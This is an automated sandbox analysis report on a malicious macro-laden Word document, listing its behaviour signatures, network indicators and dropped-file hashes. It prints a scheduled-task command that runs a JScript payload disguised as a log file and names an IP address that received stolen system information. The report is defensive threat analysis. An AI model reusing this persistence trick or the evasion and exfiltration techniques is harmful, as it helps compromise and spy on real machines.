Analysis Report
Overview
General Information |
---|
Joe Sandbox Version: | 20.0.0 |
Analysis ID: | 424458 |
Start time: | 13:59:50 |
Joe Sandbox Product: | Cloud |
Start date: | 09.11.2017 |
Overall analysis duration: | 0h 4m 55s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | adjusted_records.doc |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43) |
Number of analysed new started processes analysed: | 24 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies |
|
Detection: | MAL |
Classification: | mal100.evad.spre.expl.spyw.troj.winDOC@26/14@0/1 |
HCA Information: |
|
EGA Information: | Failed |
Cookbook Comments: |
|
Warnings: | Show All
|
Detection |
---|
Strategy | Score | Range | Reporting | Detection | |
---|---|---|---|---|---|
Threshold | 100 | 0 - 100 | Report FP / FN |
Confidence |
---|
Strategy | Score | Range | Further Analysis Required? | Confidence | |
---|---|---|---|---|---|
Threshold | 5 | 0 - 5 | false |
Classification |
---|
Analysis Advice |
---|
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior |
Signature Overview |
---|
Click to jump to signature section
Software Vulnerabilities: |
---|
Potential document exploit detected (performs HTTP gets) | Show sources |
Source: global traffic | TCP traffic: |
Potential document exploit detected (unknown TCP traffic) | Show sources |
Source: global traffic | TCP traffic: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: |
Networking: |
---|
Downloads files | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Downloads files from webservers via HTTP | Show sources |
Source: global traffic | HTTP traffic detected: | ||
Source: global traffic | HTTP traffic detected: | ||
Source: global traffic | HTTP traffic detected: |
Found strings which match to known social media urls | Show sources |
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: |
Posts data to webserver | Show sources |
Source: unknown | HTTP traffic detected: |
Urls found in memory or binary data | Show sources |
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: | ||
Source: wscript.exe | String found in binary or memory: |
Uses HTTPS | Show sources |
Source: unknown | Network traffic detected: | ||
Source: unknown | Network traffic detected: | ||
Source: unknown | Network traffic detected: | ||
Source: unknown | Network traffic detected: | ||
Source: unknown | Network traffic detected: | ||
Source: unknown | Network traffic detected: | ||
Source: unknown | Network traffic detected: | ||
Source: unknown | Network traffic detected: | ||
Source: unknown | Network traffic detected: | ||
Source: unknown | Network traffic detected: | ||
Source: unknown | Network traffic detected: | ||
Source: unknown | Network traffic detected: |
Uses a known web browser user agent for HTTP communication | Show sources |
Source: global traffic | HTTP traffic detected: | ||
Source: global traffic | HTTP traffic detected: | ||
Source: global traffic | HTTP traffic detected: | ||
Source: global traffic | HTTP traffic detected: | ||
Source: global traffic | HTTP traffic detected: | ||
Source: global traffic | HTTP traffic detected: |
Boot Survival: |
---|
Uses schtasks.exe or at.exe to add and modify task schedules | Show sources |
Source: unknown | Process created: |
Stealing of Sensitive Information: |
---|
Leaks process information | Show sources |
Source: global traffic | TCP traffic: |
Uploads sensitive system information to the internet (privacy leak) | Show sources |
Source: 192.168.1.16:49163 -> 85.93.2.148:443 | HTTP traffic detected: | ||
Source: 192.168.1.16:49164 -> 85.93.2.148:443 | HTTP traffic detected: | ||
Source: 192.168.1.16:49168 -> 85.93.2.148:443 | HTTP traffic detected: | ||
Source: 192.168.1.16:49168 -> 85.93.2.148:443 | HTTP traffic detected: | ||
Source: 192.168.1.16:49168 -> 85.93.2.148:443 | HTTP traffic detected: | ||
Source: 192.168.1.16:49169 -> 85.93.2.148:443 | HTTP traffic detected: | ||
Source: 192.168.1.16:49169 -> 85.93.2.148:443 | HTTP traffic detected: | ||
Source: 192.168.1.16:49169 -> 85.93.2.148:443 | HTTP traffic detected: | ||
Source: 192.168.1.16:49170 -> 85.93.2.148:443 | HTTP traffic detected: | ||
Source: 192.168.1.16:49171 -> 85.93.2.148:443 | HTTP traffic detected: |
Persistence and Installation Behavior: |
---|
Installs new ROOT certificates | Show sources |
Source: C:\Windows\System32\wscript.exe | Registry value created: | ||
Source: C:\Windows\System32\wscript.exe | Registry value created: | ||
Source: C:\Windows\System32\wscript.exe | Registry value created: | ||
Source: C:\Windows\System32\wscript.exe | Registry value created: | ||
Source: C:\Windows\System32\wscript.exe | Registry value created: |
Spreading: |
---|
Creates COM task schedule object (often to register a task for autostart) | Show sources |
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: | ||
Source: C:\Windows\System32\schtasks.exe | Key opened: |
Performs a network lookup / discovery via ARP | Show sources |
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
Performs a network lookup / discovery via net view | Show sources |
Source: unknown | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
System Summary: |
---|
Executable creates window controls seldom found in malware | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window found: |
Found graphical window changes (likely an installer) | Show sources |
Source: Window Recorder | Window detected: |
Checks if Microsoft Office is installed | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Uses new MSVCR Dlls | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: |
Binary contains paths to development resources | Show sources |
Source: WINWORD.EXE | Binary or memory string: |
Classification label | Show sources |
Source: classification engine | Classification label: |
Creates files inside the user directory | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Creates temporary files | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Document contains an OLE Word Document stream indicating a Microsoft Word file | Show sources |
Source: adjusted_records.doc | OLE indicator, Word Document stream: |
Document contains summary information with irregular field values | Show sources |
Source: adjusted_records.doc | OLE document summary: | ||
Source: adjusted_records.doc | OLE document summary: | ||
Source: adjusted_records.doc | OLE document summary: |
Found command line output | Show sources |
Source: C:\Windows\System32\schtasks.exe | Console Write: | ||
Source: C:\Windows\System32\cmd.exe | Console Write: |
Queries process information (via WMI, Win32_Process) | Show sources |
Source: C:\Windows\System32\wscript.exe | WMI Queries: |
Reads ini files | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: |
Reads software policies | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
SQL strings found in memory and binary data | Show sources |
Source: wscript.exe | Binary or memory string: |
Spawns processes | Show sources |
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: | ||
Source: C:\Windows\System32\wscript.exe | Process created: | ||
Source: C:\Windows\System32\wscript.exe | Process created: | ||
Source: C:\Windows\System32\wscript.exe | Process created: | ||
Source: C:\Windows\System32\taskeng.exe | Process created: | ||
Source: C:\Windows\System32\taskeng.exe | Process created: | ||
Source: C:\Windows\System32\wscript.exe | Process created: | ||
Source: C:\Windows\System32\wscript.exe | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
Uses an in-process (OLE) Automation server | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key value queried: |
Writes ini files | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File written: |
Document contains embedded VBA macros | Show sources |
Source: adjusted_records.doc | OLE indicator, VBA macros: |
Document contains an embedded VBA macro which executes code when the document is opened / closed | Show sources |
Source: adjusted_records.doc | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: AutoOpen |
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: adjusted_records.doc | OLE, VBA macro line: | |||
Source: adjusted_records.doc | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: armando |
Document contains an embedded VBA macro with suspicious strings | Show sources |
Source: adjusted_records.doc | OLE, VBA macro line: | |||
Source: adjusted_records.doc | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: armando |
Document contains an embedded macro with GUI obfuscation | Show sources |
Source: adjusted_records.doc | Stream path 'Macros/UserForm1/o' : | ||
Source: adjusted_records.doc | Stream path 'Macros/UserForm1/o' : |
Suspicious javascript / visual basic script found (invalid extension) | Show sources |
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: | ||
Source: C:\Windows\System32\taskeng.exe | Process created: | ||
Source: C:\Windows\System32\taskeng.exe | Process created: |
Wscript called in batch mode (surpress errors) | Show sources |
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: | ||
Source: C:\Windows\System32\taskeng.exe | Process created: | ||
Source: C:\Windows\System32\taskeng.exe | Process created: |
HIPS / PFW / Operating System Protection Evasion: |
---|
May try to detect the Windows Explorer process (often used for injection) | Show sources |
Source: taskeng.exe | Binary or memory string: | ||
Source: taskeng.exe | Binary or memory string: | ||
Source: taskeng.exe | Binary or memory string: |
Creates a process in suspended mode (likely to inject code) | Show sources |
Source: C:\Windows\System32\cmd.exe | Process created: | ||
Source: C:\Windows\System32\wscript.exe | Process created: | ||
Source: C:\Windows\System32\wscript.exe | Process created: | ||
Source: C:\Windows\System32\wscript.exe | Process created: | ||
Source: C:\Windows\System32\taskeng.exe | Process created: | ||
Source: C:\Windows\System32\taskeng.exe | Process created: | ||
Source: C:\Windows\System32\wscript.exe | Process created: | ||
Source: C:\Windows\System32\wscript.exe | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
Anti Debugging: |
---|
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) | Show sources |
Source: C:\Windows\System32\wscript.exe | System information queried: |
Malware Analysis System Evasion: |
---|
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory) | Show sources |
Source: wscript.exe | Binary or memory string: | ||
Source: wscript.exe | Binary or memory string: | ||
Source: wscript.exe | Binary or memory string: |
Contains long sleeps (>= 3 min) | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Thread delayed: |
Found WSH timer for Javascript or VBS script (likely evasive script) | Show sources |
Source: C:\Windows\System32\wscript.exe | Window found: | ||
Source: C:\Windows\System32\wscript.exe | Window found: | ||
Source: C:\Windows\System32\wscript.exe | Window found: |
May sleep (evasive loops) to hinder dynamic analysis | Show sources |
Source: C:\Windows\System32\wscript.exe TID: 3576 | Thread sleep time: | ||
Source: C:\Windows\System32\wscript.exe TID: 3576 | Thread sleep time: | ||
Source: C:\Windows\System32\taskeng.exe TID: 3632 | Thread sleep time: | ||
Source: C:\Windows\System32\taskeng.exe TID: 3656 | Thread sleep time: | ||
Source: C:\Windows\System32\wscript.exe TID: 3696 | Thread sleep time: | ||
Source: C:\Windows\System32\wscript.exe TID: 3920 | Thread sleep time: | ||
Source: C:\Windows\System32\wscript.exe TID: 4076 | Thread sleep time: | ||
Source: C:\Windows\System32\wscript.exe TID: 4076 | Thread sleep time: |
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines) | Show sources |
Source: C:\Windows\System32\wscript.exe | WMI Queries: | ||
Source: C:\Windows\System32\wscript.exe | WMI Queries: | ||
Source: C:\Windows\System32\wscript.exe | WMI Queries: | ||
Source: C:\Windows\System32\wscript.exe | WMI Queries: |
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) | Show sources |
Source: C:\Windows\System32\wscript.exe | WMI Queries: | ||
Source: C:\Windows\System32\wscript.exe | WMI Queries: | ||
Source: C:\Windows\System32\wscript.exe | WMI Queries: | ||
Source: C:\Windows\System32\wscript.exe | WMI Queries: | ||
Source: C:\Windows\System32\wscript.exe | WMI Queries: | ||
Source: C:\Windows\System32\wscript.exe | WMI Queries: | ||
Source: C:\Windows\System32\wscript.exe | WMI Queries: | ||
Source: C:\Windows\System32\wscript.exe | WMI Queries: |
Hooking and other Techniques for Hiding and Protection: |
---|
Disables application error messsages (SetErrorMode) | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Windows\System32\cmd.exe | Process information set: | ||
Source: C:\Windows\System32\cmd.exe | Process information set: | ||
Source: C:\Windows\System32\cmd.exe | Process information set: | ||
Source: C:\Windows\System32\cmd.exe | Process information set: | ||
Source: C:\Windows\System32\cmd.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: |
Monitors certain registry keys / values for changes (often done to protect autostart functionality) | Show sources |
Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: |
Stores large binary data to the registry | Show sources |
Source: C:\Windows\System32\wscript.exe | Key value created or modified: |
System process connects to network (likely due to code injection or exploit) | Show sources |
Source: C:\Windows\System32\wscript.exe | Network Connect: |
Language, Device and Operating System Detection: |
---|
Queries the cryptographic machine GUID | Show sources |
Source: C:\Windows\System32\wscript.exe | Key value queried: |
Behavior Graph |
---|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
14:00:54 | API Interceptor | 1x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 500ms |
14:01:04 | API Interceptor | 24x Sleep call for process: wscript.exe modified from: 60000ms to: 500ms |
14:01:06 | Task Scheduler | Run new task: Adobe Acrobat Player Task path: wscript.exe s>//b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log |
14:02:00 | API Interceptor | 2x Sleep call for process: taskeng.exe modified from: 60000ms to: 500ms |
14:02:14 | API Interceptor | 2x Sleep call for process: WINWORD.EXE modified from: 30000ms to: 500ms |
Antivirus Detection |
---|
Yara Overview |
---|
Initial Sample |
---|
No yara matches |
---|
PCAP (Network Traffic) |
---|
No yara matches |
---|
Dropped Files |
---|
No yara matches |
---|
Memory Dumps |
---|
No yara matches |
---|
Unpacked PEs |
---|
No yara matches |
---|
Screenshot |
---|
Startup |
---|
|
Created / dropped Files |
---|
File Type: | |
MD5: | FFBF840C65201C3E4B55770BCBBCE76C |
SHA1: | 302281235F3033ABCEFEB3C4E4D3F8E065C9544F |
SHA-256: | AEF29C2E92E9CC496716403005A2E3A3CF4F38A2A9A5F4D32AE45097ED31E1BB |
SHA-512: | 239B1E072E4566E442152076532CD39EA8E3FCD8CAC44C628B5FE542F153359D3225123A976A13A6746406B5FCBD75F979083AC5A63AA28FCD2AC2AFC0E4CB76 |
Malicious: | false |
Reputation: | low |
File Type: | |
MD5: | FFBF840C65201C3E4B55770BCBBCE76C |
SHA1: | 302281235F3033ABCEFEB3C4E4D3F8E065C9544F |
SHA-256: | AEF29C2E92E9CC496716403005A2E3A3CF4F38A2A9A5F4D32AE45097ED31E1BB |
SHA-512: | 239B1E072E4566E442152076532CD39EA8E3FCD8CAC44C628B5FE542F153359D3225123A976A13A6746406B5FCBD75F979083AC5A63AA28FCD2AC2AFC0E4CB76 |
Malicious: | false |
Reputation: | low |
File Type: | |
MD5: | 4873935AD2999E59B2BC7516A0D82554 |
SHA1: | F22F6A92AED3FD5A613D55B0201188557D9C5175 |
SHA-256: | 408CC39FCA0F8581EB48788DCB364B799EAC6533DF52891FB4AE4C630345755B |
SHA-512: | 02D75E8E4FCD974D9F771339FBB4083D455A0B72EF8A2ACB10898D6BD51E4609F49E4988993418831BA5CBC1383159FD00D9A23533DDC0FB9EA8EC6ADDF5D4ED |
Malicious: | false |
Reputation: | low |
File Type: | |
MD5: | AAAFB05B0ADDF2B744EECDC2C757CB90 |
SHA1: | F7654885E85A3AA2998D6E966E838EF25B43B8BD |
SHA-256: | 44FD63AD6F050EF2C9461F5F53977B17234FB2F1C1EDD6632A74E5E2E5E51E5F |
SHA-512: | 4A5A7FCEB0B51B02554776CA619530520D556FD35423AB3FE44894A3A368BF29802711065A986182C293E240D33E52D089EC46E19A1AD5138F5ED121F6B6E268 |
Malicious: | true |
Reputation: | low |
File Type: | |
MD5: | 637708A98E8A464EF7BFB87735260D3D |
SHA1: | 7D8563A107E9C30AD05B7052A82475F3DE1A9BB7 |
SHA-256: | C783E0AB4C32EBFA0349437C8058F2FE05F959CBC8068C344A4E287DF4D15CD7 |
SHA-512: | EF80C9FDCA0E118CE4949C1EC61849A3D6DD0719BAA5708DC80FAAE6A337092C2A2A66888D6EA361853226858ADD5A34F846F4ED10CEE1B37D3CEB201EFCDFE8 |
Malicious: | false |
Reputation: | low |
File Type: | |
MD5: | D63B1B2BAA7842603CC19597B9F3DBAE |
SHA1: | 79754FE55FB74E79F804468B9AA51072C3E9F197 |
SHA-256: | 11404A44CF84EECA5DBAF43D74B4E1A30952D0424CB5CE4FA22C2C1F0B5C73E6 |
SHA-512: | 8D5ED9245AEB3180DE54A9EF17A34C6ADDB4E0A6A01029D958EF312CACF7D9E18D878F2AA079EF6219E227B59119950A611437E2C3FD6CE29C648F06749AE8C5 |
Malicious: | false |
Reputation: | low |
File Type: | |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Reputation: | low |
File Type: | |
MD5: | 59CEB3AAFB9B49A443DF794ED1AA4D0D |
SHA1: | 729D2678C8A345A2E96428A3FE9901443C23C542 |
SHA-256: | AE69B1242F205B4725F5086329A68C6A45807C4B3D0D974C4151007F0792E122 |
